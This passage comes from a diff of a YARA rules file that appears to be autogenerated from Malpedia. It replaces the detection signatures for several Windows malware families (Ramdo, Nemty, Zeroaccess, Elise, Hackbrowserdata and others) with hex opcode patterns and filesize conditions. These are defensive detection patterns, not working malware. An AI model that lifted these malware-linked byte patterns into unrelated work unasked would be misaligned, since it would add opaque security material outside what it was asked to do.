+		$sequence_4 = { f6c201 7416 8088????????10 8a9405ecfdffff 8890405d0210 eb1c }
+		$sequence_5 = { c645f2ac c645f392 c645f4b0 c645f5ab c645f6b4 }
+		$sequence_6 = { c6458f00 c64590e0 c64591ee c64592ec c64593eb c64594e8 c64595e8 }
+		$sequence_7 = { c705????????01000000 50 a3???????? e8???????? 8db60c0f0210 bf???????? a5 }
+		$sequence_8 = { 50 8b4df0 e8???????? 8b4df0 8b55f0 8b410c 2b4204 }
+		$sequence_9 = { e9???????? 33d2 8a15???????? 83fa01 7514 c6458801 8d4df0 }
+
 	condition:
-		7 of them and filesize < 209920
+		7 of them and filesize < 352256
 }
-rule MALPEDIA_Win_Ramdo_Auto : FILE
+rule MALPEDIA_Win_Kimjongrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "08b789f2-d7a2-5fbb-860d-c8f55dcc2345"
+		id = "6fc69770-2665-5839-9d6a-97fd73d156df"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramdo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ramdo_auto.yar#L1-L107"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kimjongrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kimjongrat_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "276f369c53a1fdcd50e18eb96f6dc8769ce2d1ebf68a37e2dea30ad2afbcd8fa"
+		logic_hash = "edaec54e18eb1d3289f1a7f5442afe5f1403cb37fea612fda6550402130dfa44"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87433,32 +87565,32 @@ rule MALPEDIA_Win_Ramdo_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff55f8 8945fc 837dfcff 7411 }
-		$sequence_1 = { 6813299e13 6a00 6a00 e8???????? }
-		$sequence_2 = { 55 8bec 83ec0c 68b928ece1 }
-		$sequence_3 = { 83c414 68b6b2cff5 6a03 6a00 e8???????? }
-		$sequence_4 = { 68bc882a42 6a03 6a00 e8???????? }
-		$sequence_5 = { 55 8bec 83ec0c 68b928ece1 6a03 6a00 }
-		$sequence_6 = { 68ce173dab 6a03 6a00 e8???????? }
-		$sequence_7 = { 68b796c807 6a03 6a00 e8???????? }
-		$sequence_8 = { 68b900308a 6a01 6a00 e8???????? }
-		$sequence_9 = { 689aa93f35 6a05 6a00 e8???????? }
+		$sequence_0 = { ff7510 56 e8???????? 83c408 eb30 57 e8???????? }
+		$sequence_1 = { 751c 8b45f4 83c004 8945f4 8b00 43 83c704 }
+		$sequence_2 = { eb02 33db ff7610 57 e8???????? 83c408 85c0 }
+		$sequence_3 = { c7856cffffffffffffff 8b4510 80380c 7513 8b4dd4 ff31 ff7008 }
+		$sequence_4 = { eb30 c6840d64d9ffff5e eb26 c6840d64d9ffff2f eb1c c6840d64d9ffff3f eb12 }
+		$sequence_5 = { e8???????? 53 57 e8???????? 8b5304 0fbf5b26 83c414 }
+		$sequence_6 = { eb13 8b4d20 0fb6c1 85c9 bb20000000 0f45d8 80cb01 }
+		$sequence_7 = { c7852cffffff00000000 741e 8d8504ffffff 68???????? 50 e8???????? 83c408 }
+		$sequence_8 = { e8???????? 83c410 5d c3 6a00 b8???????? 6aff }
+		$sequence_9 = { e8???????? 668b4608 663345c4 b9007e0000 6623c1 83c40c 663145c4 }
 
 	condition:
-		7 of them and filesize < 548864
+		7 of them and filesize < 1572864
 }
-rule MALPEDIA_Win_Iisniff_Auto : FILE
+rule MALPEDIA_Win_7Ev3N_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6c640864-5993-563c-afe7-e26ca8c22f49"
+		id = "a2a11178-3257-5261-9f41-b916299315d7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.iisniff"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.iisniff_auto.yar#L1-L162"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.7ev3n"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.7ev3n_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "110e5f48ca56611bc57ccb877448c194f26647c840b794b9ff7133caff38a207"
+		logic_hash = "df56762186f095df1883a52e337f3ee36e53ef81834d91aa6fccabc217e84eca"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87472,37 +87604,32 @@ rule MALPEDIA_Win_Iisniff_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d7dd4 e8???????? 8b45e8 8d5d9c 8bf7 8945bc e8???????? }
-		$sequence_1 = { 8b4c240c 51 53 8d8424b4000000 e8???????? }
-		$sequence_2 = { 56 83c710 e8???????? 59 }
-		$sequence_3 = { 8d742434 e8???????? 33db 6aff }
-		$sequence_4 = { 83c404 39bc24d8000000 7210 8b8424c4000000 }
-		$sequence_5 = { 59 59 e9???????? 33ff eb90 56 }
-		$sequence_6 = { 56 8bcf e8???????? 8b442460 3bf0 770c 6aff }
-		$sequence_7 = { 8d4c0c50 6a02 e8???????? 397c2414 0f8db1feffff }
-		$sequence_8 = { ff704c e8???????? 59 83f8ff 0f852cffffff }
-		$sequence_9 = { e8???????? 3bf0 7429 8b542418 4e ebd9 837c240c10 }
-		$sequence_10 = { 6a03 68000000c0 68???????? ff15???????? 6a02 }
-		$sequence_11 = { 889c24c4000000 39bc24f4000000 7210 8b8424e0000000 50 e8???????? 83c404 }
-		$sequence_12 = { e8???????? 8b442414 8b4004 6a0a 8d440418 50 }
-		$sequence_13 = { 50 8975ec e8???????? 8975fc 807de800 7507 be04000000 }
-		$sequence_14 = { 51 8d842434010000 50 894c2418 }
+		$sequence_0 = { 75f5 2bf9 d1ff 6a00 8d8558fdffff }
+		$sequence_1 = { b8ffff0000 0fb7c0 0fb7c0 0fb7f0 eb52 }
+		$sequence_2 = { 660fd68518e1ffff 0fb705???????? 66898520e1ffff f30f7e05???????? 660fd6850ce1ffff 0fb705???????? }
+		$sequence_3 = { 8bd0 8bf0 668b02 83c202 6685c0 75f5 8dbd38f9ffff }
+		$sequence_4 = { 660fd6850cf9ffff 0fb705???????? 66898514f9ffff f30f7e05???????? 660fd68500f9ffff 0fb705???????? 66898508f9ffff }
+		$sequence_5 = { 6a00 8d858ce8ffff 50 8d8dd0cdffff e8???????? 8bce 2bcf }
+		$sequence_6 = { d1ff 6a00 8d85e8f2ffff 50 8d8dd0cdffff e8???????? 8bce }
+		$sequence_7 = { 0f4305???????? a3???????? c3 b9???????? e8???????? 68???????? e8???????? }
+		$sequence_8 = { 85ff 7f17 7c05 83fe01 7710 0f57c0 660f1345e0 }
+		$sequence_9 = { 83c702 6685c0 75f5 2bf9 d1ff 6a00 8d85d8e1ffff }
 
 	condition:
-		7 of them and filesize < 1441792
+		7 of them and filesize < 803840
 }
-rule MALPEDIA_Win_Nemty_Auto : FILE
+rule MALPEDIA_Win_Roopy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ed44110a-96dc-5598-9b44-575420ef007c"
+		id = "9d1cd38d-a1c4-5021-82c4-ab42553b0148"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemty"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nemty_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roopy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.roopy_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "f4748253b478a30babc01e1a18cefa28bd614751ff42e5c92d122e8c6c1d7fc7"
+		logic_hash = "635b23691aea648c5b01623163933331eba5c241a10085695aa02ee95522aae1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87516,32 +87643,32 @@ rule MALPEDIA_Win_Nemty_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6bf61c 8b45e8 03f0 897308 6bff1c }
-		$sequence_1 = { 53 50 89b5e4d8ffff 889decd8ffff e8???????? 83c40c 8d85e8d8ffff }
-		$sequence_2 = { 8d45c4 bf???????? e8???????? 6a01 }
-		$sequence_3 = { 8d4d0c 837d2010 56 8d3401 8b450c 57 7303 }
-		$sequence_4 = { e8???????? 53 8db570ffffff e8???????? 53 }
-		$sequence_5 = { 7302 8bc7 3bc6 740f }
-		$sequence_6 = { c785e0d8ffff10270000 ff15???????? 837d1c10 8b4508 }
-		$sequence_7 = { 50 ff35???????? ff75a4 56 ff15???????? 56 }
-		$sequence_8 = { 8a07 3a4508 7513 6a01 8d4508 }
-		$sequence_9 = { 68???????? 8d8424a8000000 e8???????? 6a07 5f 33c0 83ec1c }
+		$sequence_0 = { c7404800000000 c7404c00000000 eb15 8b55f8 8b8590fdffff 894248 8b8594fdffff }
+		$sequence_1 = { f3a4 0fb7859cfcffff 68ff000000 8d8d70fbffff baffffffff }
+		$sequence_2 = { 7fbe 8d85ccefffff 50 6801100000 8d85d0efffff 50 ff75e4 }
+		$sequence_3 = { 8d55f8 8b45f0 ff15???????? 8d55fc 89d8 }
+		$sequence_4 = { e8???????? 39d6 7c06 7f0a 39c3 7706 c6042401 }
+		$sequence_5 = { 89c2 83ea01 8b45f8 8b4004 e8???????? }
+		$sequence_6 = { 89c7 89fa b8???????? e8???????? 8b5654 895024 89f8 }
+		$sequence_7 = { 89de 89f0 e8???????? 89c7 89d3 8b45fc }
+		$sequence_8 = { 8b45a4 8d5058 8b4da4 8b412c b91c000000 e8???????? 83459001 }
+		$sequence_9 = { 8d858cfcffff 30c9 6631d2 e8???????? 0fb785a4fcffff 68ff000000 8d8d70fbffff }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 739328
 }
-rule MALPEDIA_Win_Neteagle_Auto : FILE
+rule MALPEDIA_Win_Chir_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "552fea63-ea2d-5d68-acbe-acbcf4f3fc62"
+		id = "93c47970-4fc6-58a0-955d-3bbd03cb7c7f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.neteagle_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chir"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.chir_auto.yar#L1-L113"
 		license_url = "N/A"
-		logic_hash = "d61d147c710715632ec1c821209ba30c6e6f1ac5fd2be9819dd093a236f5d3aa"
+		logic_hash = "5c119df17edac6114f59bfe70ffc894c68fbc3a6604aa7943345ac49df6c4fce"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87555,34 +87682,34 @@ rule MALPEDIA_Win_Neteagle_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 6a00 ff15???????? 8b44241c 8d4c2424 6a00 51 }
-		$sequence_1 = { 8d4dec e9???????? 8d4dd8 e9???????? 8b45e4 50 }
-		$sequence_2 = { 8b4678 8b3d???????? 50 8b4620 6a01 6880000000 }
-		$sequence_3 = { 50 6a00 6880000000 51 ffd7 6a01 6a00 }
-		$sequence_4 = { c684241c02000002 8b70f8 81fe00010000 7e1d 8bb42424020000 }
-		$sequence_5 = { 52 50 ffd5 6a07 8d8c2428010000 68???????? }
-		$sequence_6 = { e8???????? 8d4c2420 c644243c01 e8???????? 8b442414 bf???????? 8a10 }
-		$sequence_7 = { 8d4c2418 c644245801 e8???????? 8d4c2434 e8???????? 8d542464 }
-		$sequence_8 = { 52 8944244c e8???????? 8d4c2414 c644243803 e8???????? }
-		$sequence_9 = { 8964242c 51 8d4c2434 e8???????? 8d542428 8bce 52 }
+		$sequence_0 = { 8d45f4 50 c745f421352432 c745f851173300 e8???????? }
+		$sequence_1 = { 48 59 6a00 5e 7419 8d4c35f8 8a11 }
+		$sequence_2 = { c745fc51173300 e8???????? 83c410 48 }
+		$sequence_3 = { 33c9 807df905 0f94c1 33d2 48 8d4c0901 }
+		$sequence_4 = { 59 8bfb 7419 8d4c3df0 8a11 }
+		$sequence_5 = { e8???????? 59 33c9 48 }
+		$sequence_6 = { 8811 3bf0 72e7 57 }
+		$sequence_7 = { 8bc4 fc 56 57 }
+		$sequence_8 = { 8bfb 7419 8d4c3df0 8a11 80f2fc 80c202 }
+		$sequence_9 = { 8d45f8 50 c745f840214125 c745fc32212400 }
 
 	condition:
-		7 of them and filesize < 262144
+		7 of them and filesize < 286720
 }
-rule MALPEDIA_Win_Zeroaccess_Auto : FILE
+rule MALPEDIA_Win_Elise_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "89374e4f-79aa-58be-a3f5-45921879c769"
+		id = "11ed4b5e-b7d9-57f1-b779-a93a47cbf173"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zeroaccess_auto.yar#L1-L147"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.elise"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.elise_auto.yar#L1-L209"
 		license_url = "N/A"
-		logic_hash = "b8098d3dcd80de1c46676c7e1dd2cdf56db87599f68b360b87ffc70001011948"
+		logic_hash = "09615a6853721651624e029a2091d82fab132dd6d80506edb16bc08b652a8438"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -87594,36 +87721,43 @@ rule MALPEDIA_Win_Zeroaccess_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 7408 ff15???????? eb02 }
-		$sequence_1 = { 8b01 ff761c ff7618 ff5004 }
-		$sequence_2 = { 8d45fc 50 6a01 8d45f4 50 }
-		$sequence_3 = { ff15???????? 85c0 7407 b8e3030000 }
-		$sequence_4 = { 45 33c0 48 83c9ff c744242804000000 48 }
-		$sequence_5 = { 3bc1 7604 83c8ff c3 }
-		$sequence_6 = { 56 8d45f8 50 ff15???????? 6a01 8d45f8 }
-		$sequence_7 = { 6889001200 8d45fc 50 ff15???????? }
-		$sequence_8 = { bf03000040 eb05 bf010000c0 85ff }
-		$sequence_9 = { 8d4e08 e8???????? f644240801 740c }
-		$sequence_10 = { 50 6819000200 8d45f8 50 ff15???????? 85c0 }
-		$sequence_11 = { 48 83e1f0 48 8bc1 e8???????? 48 8b05???????? }
-		$sequence_12 = { 8b4318 48 8b5328 48 8b30 48 8bce }
-		$sequence_13 = { 3b05???????? 7316 48 8d0d56560000 48 8bd3 }
+		$sequence_0 = { 8dbe1e050000 f3ab 8bc2 0fb7d0 }
+		$sequence_1 = { 7205 8d0429 eb02 33c0 5f 5e }
+		$sequence_2 = { 4e 237720 d3e6 59 }
+		$sequence_3 = { 8b10 53 8a5c2408 8d4804 }
+		$sequence_4 = { 7ce9 33c0 40 5b 5e 5f c3 }
+		$sequence_5 = { 8bc6 e8???????? 85c0 0f8484000000 53 }
+		$sequence_6 = { 55 33c9 57 ba00040000 85c0 760e }
+		$sequence_7 = { 8bcb 8d3470 d3e0 0945f4 43 83fb04 }
+		$sequence_8 = { 7cf5 33c9 888f00010000 888f01010000 8bf7 8945f8 }
+		$sequence_9 = { 885d88 e8???????? 83c40c 8d4580 }
+		$sequence_10 = { 33f6 46 d3e6 0bd6 40 83f80e 72e7 }
+		$sequence_11 = { ff15???????? eb0b 6a02 53 53 }
+		$sequence_12 = { ff75ec 1155f4 53 e8???????? 8bd8 8955ec }
+		$sequence_13 = { 56 57 b99a000000 8d7510 }
+		$sequence_14 = { eb03 8b7df4 8d4e01 81e1ff000080 7908 49 }
+		$sequence_15 = { 6a20 e8???????? 59 8bd8 }
+		$sequence_16 = { 46 4f 75eb f7d0 5f 5e }
+		$sequence_17 = { 83c40c 8d4580 50 8d4588 50 53 }
+		$sequence_18 = { 85ff 7415 0fb616 33d0 23d1 }
+		$sequence_19 = { 50 ff7580 e8???????? 85c0 }
+		$sequence_20 = { 59 8b45f0 8b55f4 5f 5e 5b c9 }
 
 	condition:
-		7 of them and filesize < 172032
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Mydogs_Auto : FILE
+rule MALPEDIA_Win_Nosu_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9688d839-8d35-5299-b5ae-d8084dbff6c0"
+		id = "fdc65506-7690-528c-80ea-bfae31870e43"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mydogs"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mydogs_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nosu"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nosu_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "4d3f1e38f0e3ee2bcc850d56898106585e9b5f7ff2ecd490e245883ad04d625f"
+		logic_hash = "63b3125b2fa7b440ce66614e4988544ad3a96e52c6fcd77e2718549a9b26e496"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87637,32 +87771,32 @@ rule MALPEDIA_Win_Mydogs_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b5d94 8b75cc 8b7dc8 85db }
-		$sequence_1 = { 8a01 88040a 41 84c0 75f6 3885c8feffff 0f84f6060000 }
-		$sequence_2 = { 66c745d90000 c645db00 c645dc00 c745f500000000 66c745f90000 c645fb00 c6459c00 }
-		$sequence_3 = { 6a00 8bcf 81e900803ed5 8bc6 6880969800 1ddeb19d01 50 }
-		$sequence_4 = { 72d7 61 9d 0fb605???????? f30f7e05???????? 8845a4 }
-		$sequence_5 = { 40 8945e4 8bc3 99 83e203 33c9 }
-		$sequence_6 = { 68???????? 68???????? 8d85f8feffff 50 ff15???????? 68???????? }
-		$sequence_7 = { 8bcf e8???????? 8bd0 8bce e8???????? 83c404 }
-		$sequence_8 = { 50 0fb744243a 50 68???????? 8d442450 682c010000 50 }
-		$sequence_9 = { ff15???????? 85c0 7518 6860ea0000 ffd6 6a00 8d442428 }
+		$sequence_0 = { 56 c605????????01 ff15???????? ff35???????? ff15???????? }
+		$sequence_1 = { eb1e 8d4714 50 8d5710 8d4c2418 e8???????? 8bf0 }
+		$sequence_2 = { 8d87d8000000 50 e8???????? 8b542420 8d87480d0000 83c40c 8bcf }
+		$sequence_3 = { 55 50 57 55 6a00 6a00 8d8680000000 }
+		$sequence_4 = { 8bc8 8954243c e8???????? 83c120 83ef01 75f3 8d86f8030000 }
+		$sequence_5 = { 663902 74f8 52 51 8d85f8fbffff 50 ff15???????? }
+		$sequence_6 = { 744c 6800020000 ff74242c 8d442438 50 ff15???????? 8d442430 }
+		$sequence_7 = { c20400 53 8bda 8bd1 56 57 8b3a }
+		$sequence_8 = { 8d5508 6a02 894508 e8???????? 85c0 59 0f95c0 }
+		$sequence_9 = { 50 56 ff15???????? 8bd0 8bce e8???????? 59 }
 
 	condition:
-		7 of them and filesize < 313344
+		7 of them and filesize < 513024
 }
-rule MALPEDIA_Win_Rofin_Auto : FILE
+rule MALPEDIA_Win_Tuoni_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0195ab71-caac-5cd0-8cdc-a4640763982a"
+		id = "04148cf8-207a-5f06-9dd5-362667335e9a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rofin"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rofin_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tuoni"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tuoni_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "1fdbbf0f641674931110c0fd75e6ced74603c00b71d8e67aaa8404e587da89df"
+		logic_hash = "21517c25b667838bd9ce6eb05310b526a84de45e68772e4427c4bd14266f2821"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87676,32 +87810,32 @@ rule MALPEDIA_Win_Rofin_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 49 8bd9 83fbfd 7605 e8???????? 8b6c245c 8b4d04 }
-		$sequence_1 = { 837c243c0a 7568 8b54241c 52 ff15???????? 89442410 8b44241a }
-		$sequence_2 = { 56 ff15???????? 8be8 ffd3 56 ff15???????? 33c0 }
-		$sequence_3 = { e8???????? 83c404 895c2418 8b84240c090000 3bc3 7409 50 }
-		$sequence_4 = { 53 8bc8 8a1c38 c1f903 8d3411 8bc8 83e107 }
-		$sequence_5 = { 3bc1 720a c744241202000000 eb3d 8b4c2422 8b461c 3bc8 }
-		$sequence_6 = { f2ae f7d1 49 51 56 8d4c2418 e8???????? }
-		$sequence_7 = { 3bc8 745d 8b4610 85c0 741b 8b7e0c 8d5f10 }
-		$sequence_8 = { ff15???????? 83f8ff 7508 ff15???????? 8bd8 8d54240c c744240c00000000 }
-		$sequence_9 = { 83c604 83c410 83c714 81fe???????? 7cdf 8bcd e8???????? }
+		$sequence_0 = { ff15???????? ffb5a4fbffff ffd6 6a08 8d85a8fbffff 50 ff15???????? }
+		$sequence_1 = { 8d4da8 e8???????? 8d4dc0 e8???????? e9???????? 68???????? e8???????? }
+		$sequence_2 = { 8bf8 85ff 7423 8d45e8 50 8d8598fbffff 50 }
+		$sequence_3 = { 89412c 894130 8bc1 c3 83790400 740c 6a18 }
+		$sequence_4 = { 51 ff37 e8???????? 59 59 5e 892f }
+		$sequence_5 = { ff15???????? 50 6a00 57 ff15???????? 8bf8 85ff }
+		$sequence_6 = { 7404 c645d701 f6c302 740b 8d4da4 83e3fd }
+		$sequence_7 = { 8d85a0fbffff 50 ffd7 ff15???????? 50 6a00 6800040000 }
+		$sequence_8 = { 894598 8b452c 894590 8b4530 894594 6a44 5f }
+		$sequence_9 = { 68???????? e8???????? 83c40c 8d4dd8 e8???????? 8d8594fbffff 50 }
 
 	condition:
-		7 of them and filesize < 409600
+		7 of them and filesize < 734208
 }
-rule MALPEDIA_Win_Makloader_Auto : FILE
+rule MALPEDIA_Win_Hackbrowserdata_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0f3149c9-1ed5-5172-a5f9-8fb09f83bab4"
+		id = "d3aae9ed-192f-5ff5-b564-ee9df4ce3245"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.makloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.makloader_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hackbrowserdata"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hackbrowserdata_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "d48950dd774d94fc31c8ea99b96c15449f45f0477bbb34828e1e9167b3ed582c"
+		logic_hash = "2b6a9208dc476df90c318e1825117cca44974a3b5522e1f9f1cb79fdbda237c3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87715,32 +87849,32 @@ rule MALPEDIA_Win_Makloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8945fc 837dfc0a 7332 8b4dfc 51 8b4df8 }
-		$sequence_1 = { 8b4dfc 034820 894de8 8b55f4 }
-		$sequence_2 = { 8d8d6cfeffff 83c1ff 898d24e6ffff 8b9524e6ffff 8a4201 888561e6ffff 838524e6ffff01 }
-		$sequence_3 = { 52 8b4dfc e8???????? 8b4dfc 884135 ba01000000 6bc235 }
-		$sequence_4 = { e8???????? 83c404 ba01000000 6bca03 8b5508 0fbe0c0a 33c1 }
-		$sequence_5 = { 8a956be6ffff 8811 8b85d4e5ffff 83c001 8985d4e5ffff 8b8d08e6ffff 83c101 }
-		$sequence_6 = { 6bc21c 8b4d08 0fb61401 52 8b4dfc }
-		$sequence_7 = { 6bd105 8b4c05bc 894c15bc 8b4405c0 894415c0 b908000000 }
-		$sequence_8 = { c705????????f8504200 b001 c3 68???????? e8???????? c70424???????? }
-		$sequence_9 = { 8b4dfc 884114 ba01000000 6bc214 }
+		$sequence_0 = { eb14 488b8c2458010000 488b5150 e8???????? 498913 48c7415000000000 488b842410010000 }
+		$sequence_1 = { c3 4989f0 4d8b4008 4883c610 48ffc0 4a8d0c01 488d4901 }
+		$sequence_2 = { eb22 488d1568e79f00 488b5c2470 488b442468 488b8c24a8000000 488d354f6ba000 31d2 }
+		$sequence_3 = { 884c2446 e8???????? 48898c24e8000000 4889bc24f0000000 4885c9 7459 0fb64c2447 }
+		$sequence_4 = { eb17 e8???????? 488bb42458010000 498933 4c8b00 4d894308 488930 }
+		$sequence_5 = { e8???????? 488d0551f2d100 bb32000000 e8???????? 90 4889442408 e8???????? }
+		$sequence_6 = { e8???????? 488b9c2480000000 49891b 488b340a 49897308 48891c0a 488d0589e51a00 }
+		$sequence_7 = { f00fc15848 ffcb 85db 7d10 4c89c0 e8???????? 488b842408010000 }
+		$sequence_8 = { c6461506 4889ca 90 83793000 742d 488d0d44bc7d00 48894c2478 }
+		$sequence_9 = { e8???????? 0f1f440000 83f803 750d 8b9424c0000000 85d2 7509 }
 
 	condition:
-		7 of them and filesize < 335872
+		7 of them and filesize < 42451968
 }
-rule MALPEDIA_Win_Darkmoon_Auto : FILE
+rule MALPEDIA_Win_Fanny_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5d3b6757-7119-5541-a7be-7724ca1cd5bf"
+		id = "636b5d30-80f3-5732-bf96-9c4782cd973d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmoon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darkmoon_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fanny_auto.yar#L1-L173"
 		license_url = "N/A"
-		logic_hash = "d37414a84f00a17b4ccc08379aad2daedc420510e1678b61639cea473c36abeb"
+		logic_hash = "194cb9aecc835fe3bc3c50607cb7b5a60a928574c0136642094275d35cd55914"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87754,34 +87888,40 @@ rule MALPEDIA_Win_Darkmoon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6802000080 ff5645 8d45fc 50 }
-		$sequence_1 = { 50 ff5679 6a00 8d8514faffff }
-		$sequence_2 = { 0f843cffffff 33c0 6a00 c1e009 6a00 }
-		$sequence_3 = { 51 50 50 8d860f040000 }
-		$sequence_4 = { 6a00 6800000080 8d86b1060000 50 ff5659 50 6888b6b6fc }
-		$sequence_5 = { 33d2 8dbe48010000 6834284050 8903 6800080000 56 894b04 }
-		$sequence_6 = { 8d44241c 52 8b542414 8d4c2418 50 }
-		$sequence_7 = { 8d4f0c 52 e8???????? 8d44240c }
-		$sequence_8 = { ff96d1000000 5a 59 8901 59 03d1 ebd3 }
-		$sequence_9 = { 8d86120e0000 8945cc 8d45dc 50 6a01 }
+		$sequence_0 = { 8b45d4 50 e8???????? 8945fc 8b4dfc }
+		$sequence_1 = { 8d4dd8 e8???????? 8b45b0 eb1a c745ac01000000 }
+		$sequence_2 = { 897c2410 56 e8???????? 8b442414 83c404 }
+		$sequence_3 = { 85c9 7615 8bd9 b801010101 8bfe }
+		$sequence_4 = { 50 ffd3 85c0 59 894604 }
+		$sequence_5 = { 5d c20800 55 8bec 81ec38020000 }
